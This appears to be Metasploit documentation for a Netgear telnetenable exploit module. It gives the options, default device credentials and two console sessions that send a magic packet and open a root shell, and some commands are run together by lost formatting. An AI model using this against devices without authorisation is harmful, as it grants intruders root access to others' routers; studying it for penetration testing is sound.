documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
Several models of Netgear devices have a hidden telnet daemon that can be enabled for remote LAN users by sending a 'magic packet' to the device. Upon successful connect, a root shell should be presented to the user.
There are many devices which contain this daemon, for a full list see OpenWrt.
This module has been successfully tested against:
A MAC address is required for exploitation. To determine the MAC address of the device:
ping -c 1 [IP]arp -an [IP]If you are the root user, you can skip this step. ARP will be leveraged to find the MAC address.
0 (Automatic)
Detect if a device listens on TCP or UDP.
1 (TCP)
Older devices usually listen on TCP.
2 (UDP)
Newer devices usually listen on UDP.
Set this to the MAC address of the device. You can use ping and arp
to find it.
You can leave this blank if you're root.
If this is an older device, it'll take the value of super_username in
nvram, which is usually unchanged from Gearguy.
If this is a newer device, it'll take the web UI username, which is
usually unchanged from admin.
You can leave this blank to use the default username.
If this is an older device, it'll take the value of super_passwd in
nvram, which is usually unchanged from Geardog.
If this is a newer device, it'll take the web UI password, which is
usually unchanged from password.
You can leave this blank to use the default password.
use exploit/linux/telnet/netgear_telnetenableset rhost [IP]set mac [MAC Address] if not running as rootexploitAs a normal user:
msf > use exploit/linux/telnet/netgear_telnetenable
msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
[*] exec: ping -c 1 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=2.04 ms
--- 192.168.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 2.041/2.041/2.041/0.000 ms
msf exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
[*] exec: arp -an 192.168.1.1
? (192.168.1.1) at [redacted] [ether] on wlan0
msf exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
mac => [redacted]
msf exploit(linux/telnet/netgear_telnetenable) > run
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[+] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.3:34833 -> 192.168.1.1:23) at 2018-03-02 19:26:25 -0600
id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
As root:
msf > use exploit/linux/telnet/netgear_telnetenable
msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
rmsf exploit(linux/telnet/netgear_telnetenable) > run
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[*] 192.168.1.1:23 - Attempting to discover MAC address via ARP
[+] 192.168.1.1:23 - Found MAC address [redacted]
[+] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:37771 -> 192.168.1.1:23) at 2018-03-02 19:33:42 -0600
id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#